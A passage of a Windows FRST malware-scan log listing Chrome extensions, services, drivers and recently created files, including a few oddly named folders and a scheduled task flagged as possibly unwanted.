CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-09]
CHR Extension: (Arabic) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-09]
CHR Extension: (HP Client Security Manager) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncffjdbbodifgldkcbhmiiljfcnbgjab [2017-04-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-09]
CHR Extension: (Adblock Pro) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocifcklkibdehekfnmflempfgjhbedch [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-09]
CHR Extension: (Chrome Media Router) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-09]
CHR HKLM-x32\...\Chrome\Extension: [ncffjdbbodifgldkcbhmiiljfcnbgjab] - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome.crx [2014-06-26]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [10508904 2017-04-05] (COMODO)
R3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876096 2017-04-05] (COMODO)
R2 CtAgentService; C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe [7168 2014-03-31] () [File not signed]
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-04-08] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-04-08] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-04-06] (Dropbox, Inc.)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
R2 DpHost; c:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpHostW.exe [500048 2014-07-28] (DigitalPersona, Inc.)
R2 FLCDLOCK; c:\windows\SysWOW64\flcdlock.exe [567608 2013-11-20] (Hewlett-Packard Company)
R2 HpDamServiceHost; c:\Program Files (x86)\Hewlett-Packard\HP Device Access Manager\HP.ProtectTools.DeviceAccessManager.ServiceHost.exe [18232 2013-11-15] (Hewlett-Packard Development Company)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-06-25] (Intel Corporation)
R2 iBtSiva; C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe [122984 2014-09-16] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [359848 2015-09-15] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel)
R2 ISCTAgent; c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe [209712 2014-08-14] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-09-23] ()
S3 OpenVpnService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [15872 2016-11-25] ( ) [File not signed]
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [70272 2016-12-27] (The OpenVPN Project)
S3 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [70272 2016-12-27] (The OpenVPN Project)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-04] (Realtek Semiconductor)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-12-04] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-09-23] (Intel® Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [141624 2014-05-13] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1424184 2014-06-17] (Motorola Solutions, Inc.)
S3 btmlehid; C:\Windows\system32\drivers\btmlehid.sys [83256 2014-02-04] (Motorola Solutions, Inc.)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [31664 2017-03-28] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [848736 2017-03-28] (COMODO)
R2 DAMDrv; C:\Windows\System32\DRIVERS\DAMDrv64.sys [65752 2013-10-07] (Hewlett-Packard Company)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-04-08] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-04-08] (Disc Soft Ltd)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-06-07] (Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [222664 2014-09-16] (Intel Corporation)
R3 ikbevent; C:\Windows\System32\DRIVERS\ikbevent.sys [22216 2014-05-27] ()
R3 imsevent; C:\Windows\System32\DRIVERS\imsevent.sys [22728 2014-05-27] ()
R3 INETMON; C:\windows\System32\Drivers\INETMON.sys [25800 2014-05-27] ()
R3 ISCT; C:\Windows\system32\drivers\ISCTD.sys [44744 2014-05-27] ()
R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3429144 2014-10-17] (Intel Corporation)
R0 PinFile; C:\Windows\System32\DRIVERS\PinFile.sys [49856 2014-12-06] (WinMagic Inc.)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [476888 2014-03-22] (Realsil Semiconductor Corporation)
R0 SDDisk2K; C:\Windows\System32\DRIVERS\SDDisk2K.sys [228544 2014-12-06] (WinMagic Inc.)
R0 SDDToki; C:\Windows\System32\DRIVERS\SDDToki.sys [131264 2014-12-06] (WinMagic Inc.)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [32496 2014-10-31] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [33008 2014-10-31] (Synaptics Incorporated)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv_x64.sys [674592 2014-10-07] (Sunplus)
S3 t_mouse.sys; C:\Windows\System32\DRIVERS\t_mouse.sys [6144 2012-12-19] ()
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [213296 2014-10-15] (Windows (R) Win 7 DDK provider)
S3 dbx; system32\DRIVERS\dbx.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-10 19:27 - 2017-04-10 19:28 - 00001078 _____ C:\Windows\system32dbgraw.bmp
2017-04-10 14:00 - 2017-04-10 14:00 - 00336784 _____ C:\Users\Tesla\Desktop\Earth.jpeg
2017-04-09 22:39 - 2017-04-09 22:41 - 00000000 ____D C:\AdwCleaner
2017-04-09 22:39 - 2017-04-09 22:39 - 04089296 _____ C:\Users\Tesla\Desktop\adwcleaner_6.045.exe
2017-04-09 22:31 - 2017-04-09 22:31 - 00000000 ____D C:\Users\Tesla\AppData\Local\ElevatedDiagnostics
2017-04-09 21:35 - 2017-04-09 21:35 - 00000000 ____D C:\Users\Tesla\AppData\Local\Steam
2017-04-09 21:33 - 2017-04-09 21:42 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-09 21:33 - 2017-04-09 21:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-04-09 21:06 - 2017-04-09 21:06 - 00037280 _____ C:\Users\Tesla\Desktop\Addition.txt
2017-04-09 21:05 - 2017-04-10 19:28 - 00028707 _____ C:\Users\Tesla\Desktop\FRST.txt
2017-04-09 21:04 - 2017-04-10 19:28 - 00000000 ____D C:\FRST
2017-04-09 21:04 - 2017-04-09 21:04 - 02424832 _____ (Farbar) C:\Users\Tesla\Desktop\FRST64.exe
2017-04-09 21:01 - 2017-04-09 21:01 - 00001068 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-09 21:01 - 2017-04-09 21:01 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-09 20:53 - 2017-04-09 20:53 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Google
2017-04-09 20:53 - 2017-04-09 20:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth
2017-04-09 20:51 - 2017-04-09 20:51 - 00002274 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-09 20:50 - 2017-04-09 20:50 - 00003384 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-09 20:50 - 2017-04-09 20:50 - 00003256 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-09 12:50 - 2017-04-09 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm
2017-04-09 12:16 - 2017-04-09 12:52 - 00000000 ____D C:\Users\Tesla\Documents\Heroes of the Storm
2017-04-09 11:42 - 2017-04-10 08:03 - 00003404 _____ C:\Windows\system32\Boot 01
2017-04-09 11:29 - 2017-04-09 11:37 - 00000000 ____D C:\Users\Tesla\AppData\Local\DigitalPersona,_Inc
2017-04-09 11:29 - 2017-04-09 11:29 - 00000000 ____D C:\Users\Tesla\AppData\Local\Disc_Soft_Ltd
2017-04-09 11:28 - 2017-04-09 11:28 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-04-08 23:43 - 2017-04-08 23:43 - 00002648 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\BitTorrent.lnk
2017-04-08 23:42 - 2017-04-08 23:43 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\BitTorrent
2017-04-08 22:27 - 2017-04-08 22:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-04-08 22:26 - 2017-04-10 19:28 - 00000906 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-04-08 22:26 - 2017-04-10 08:03 - 00000902 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-04-08 22:26 - 2017-04-08 22:27 - 00000000 ____D C:\Users\Tesla\AppData\Local\Dropbox
2017-04-08 22:26 - 2017-04-08 22:27 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-04-08 22:26 - 2017-04-08 22:26 - 00003902 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineUA
2017-04-08 22:26 - 2017-04-08 22:26 - 00003650 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineCore
2017-04-08 22:26 - 2017-04-08 22:26 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Dropbox
2017-04-08 22:26 - 2017-04-08 22:26 - 00000000 ____D C:\ProgramData\Dropbox
2017-04-08 22:25 - 2017-04-08 22:25 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Sun
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Sun
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\ProgramData\Oracle
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-08 22:25 - 2017-04-08 22:25 - 00000000 ____D C:\Program Files\Java
2017-04-08 22:15 - 2017-04-08 22:15 - 00006046 _____ C:\Windows\System32\Tasks\Rqutyaninit Agent
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Weqeriedecok
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Users\Tesla\AppData\Local\Joruph
2017-04-08 22:15 - 2017-04-08 22:15 - 00000000 ____D C:\Program Files (x86)\Dermupy
2017-04-08 22:14 - 2017-04-09 11:28 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:15 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-04-08 22:14 - 2017-04-08 22:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-04-08 22:14 - 2017-04-08 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite
2017-04-08 22:14 - 2017-04-08 22:14 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-04-08 22:12 - 2017-04-08 22:12 - 00000901 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
2017-04-08 22:12 - 2017-04-08 22:12 - 00000000 ____D C:\Program Files\GIMP 2
2017-04-08 22:11 - 2017-04-08 22:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XnView
2017-04-08 22:11 - 2017-04-08 22:11 - 00000000 ____D C:\Program Files (x86)\XnView
2017-04-08 22:10 - 2017-04-08 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RStudio
2017-04-08 22:10 - 2017-04-08 22:10 - 00000000 ____D C:\Program Files\RStudio
2017-04-08 18:52 - 2017-04-10 08:45 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-08 18:52 - 2017-04-08 18:52 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-08 18:52 - 2017-03-24 04:10 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-08 18:51 - 2017-04-08 18:51 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\OpenOffice
2017-04-08 18:51 - 2017-04-08 18:51 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\LibreOffice
2017-04-08 18:50 - 2017-04-08 18:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LibreOffice 5.3
2017-04-08 18:50 - 2017-04-08 18:50 - 00000000 ____D C:\Program Files\LibreOffice 5
2017-04-08 18:46 - 2017-04-08 18:46 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.3
2017-04-08 18:46 - 2017-04-08 18:46 - 00000000 ____D C:\Program Files (x86)\OpenOffice 4
2017-04-08 18:42 - 2017-04-08 22:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R
2017-04-08 18:42 - 2017-04-08 18:42 - 00000000 ____D C:\Program Files\R
2017-04-08 17:04 - 2017-04-08 18:55 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\MPC-HC
2017-04-08 17:04 - 2017-04-08 17:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC-HC x64
2017-04-08 17:04 - 2017-04-08 17:04 - 00000000 ____D C:\Program Files\MPC-HC
2017-04-06 18:57 - 2017-04-06 18:57 - 00046408 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\.mono
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Blizzard Entertainment
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\Users\Tesla\AppData\Local\Blizzard
2017-04-06 11:25 - 2017-04-06 11:25 - 00000000 ____D C:\ProgramData\.mono
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Users\Tesla\AppData\Local\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\ProgramData\Last.fm
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Program Files (x86)\Winamp
2017-04-05 14:41 - 2017-04-05 14:41 - 00000000 ____D C:\Program Files (x86)\Last.fm
2017-04-05 08:31 - 2017-04-08 16:32 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForTesla.job
2017-04-05 08:31 - 2017-04-07 14:55 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForTesla
2017-04-05 08:31 - 2017-04-05 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Local\Hewlett-Packard
2017-04-04 16:33 - 2017-04-04 16:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hearthstone
2017-04-04 16:30 - 2017-04-09 12:52 - 00000000 ____D C:\ProgramData\Blizzard Entertainment
2017-04-04 16:29 - 2017-04-10 09:21 - 00000000 ____D C:\Users\Tesla\AppData\Local\Battle.net
2017-04-04 16:29 - 2017-04-09 16:46 - 00000000 ____D C:\Users\Tesla\AppData\Local\CrashDumps
2017-04-04 16:29 - 2017-04-04 16:29 - 00000000 ____D C:\Users\Tesla\AppData\Local\Blizzard Entertainment
2017-04-04 16:29 - 2017-04-04 16:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blizzard App
2017-04-04 16:28 - 2017-04-04 16:30 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Battle.net
2017-04-04 16:28 - 2017-04-04 16:28 - 00000000 ____D C:\ProgramData\Battle.net
2017-04-04 09:34 - 2017-04-10 19:28 - 00000000 ____D C:\Users\Tesla\AppData\Local\Spotify
2017-04-04 09:34 - 2017-04-10 13:17 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Spotify
2017-04-04 09:34 - 2017-04-04 09:34 - 00001760 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2017-04-04 08:38 - 2017-04-04 08:38 - 00000568 _____ C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2017-04-04 08:38 - 2017-04-04 08:38 - 00000486 _____ C:\Windows\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
2017-04-04 08:38 - 2017-04-04 08:38 - 00000200 _____ C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-04-04 08:25 - 2015-07-16 21:12 - 06131200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2017-04-04 08:25 - 2015-07-16 21:12 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2017-04-04 08:25 - 2015-07-16 21:12 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 07077376 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 01057792 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2017-04-04 08:25 - 2015-07-16 21:11 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2017-04-04 08:25 - 2015-07-11 15:15 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2017-04-03 16:12 - 2015-12-20 20:50 - 03180544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2017-04-03 16:12 - 2015-12-20 20:50 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2017-04-03 16:12 - 2015-12-20 16:08 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2017-04-03 16:12 - 2014-12-11 19:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2017-04-03 16:09 - 2017-04-03 16:09 - 00000223 _____ C:\Windows\system32\{8A694AF2-286D-429D-867A-3F95898EE308}.bat
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\SysWOW64\SET3D26.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4F33.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4DD6.tmp
2017-04-03 16:05 - 2017-04-03 16:05 - 00000000 _____ C:\Windows\system32\SET4968.tmp
2017-04-03 16:03 - 2017-04-10 09:17 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-04-03 16:03 - 2017-04-03 16:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-04-03 15:56 - 2013-10-02 04:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2017-04-03 15:56 - 2013-10-02 04:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2017-04-03 15:56 - 2013-10-02 04:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2017-04-03 15:56 - 2013-10-02 03:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2017-04-03 15:56 - 2013-10-02 03:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2017-04-03 15:56 - 2013-10-02 03:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2017-04-03 15:56 - 2013-10-02 02:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2017-04-03 15:56 - 2013-10-02 02:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2017-04-03 15:56 - 2013-10-02 01:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2017-04-03 15:56 - 2013-10-02 00:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2017-04-03 15:55 - 2012-08-23 16:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2017-04-03 15:55 - 2012-08-23 16:08 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2017-04-03 15:55 - 2012-08-23 13:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2017-04-03 15:55 - 2012-08-23 12:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2017-04-03 15:54 - 2015-08-05 19:56 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\icaapi.dll
2017-04-03 15:54 - 2015-08-05 19:06 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2017-04-03 15:53 - 2017-03-08 06:33 - 03165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-03 15:53 - 2017-03-08 06:33 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-03 15:53 - 2017-03-08 06:33 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-03 15:53 - 2017-03-08 06:31 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-04-03 15:53 - 2017-03-08 06:22 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-04-03 15:53 - 2017-03-08 06:18 - 02651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-03 15:53 - 2017-03-08 06:16 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-03 15:53 - 2017-03-08 06:16 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-04-03 15:53 - 2017-03-08 06:16 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-04-03 15:53 - 2017-03-08 06:07 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-04-03 15:53 - 2017-03-08 06:06 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-04-03 15:53 - 2017-03-08 06:06 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-04-03 15:53 - 2017-03-08 06:06 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2017-04-03 15:53 - 2017-02-14 18:33 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-03 15:53 - 2017-02-14 18:19 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2017-04-03 15:53 - 2017-02-11 18:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-04-03 15:53 - 2017-02-11 18:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-04-03 15:53 - 2017-02-09 18:32 - 00769536 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-03 15:53 - 2017-02-09 18:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-03 15:53 - 2017-02-09 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
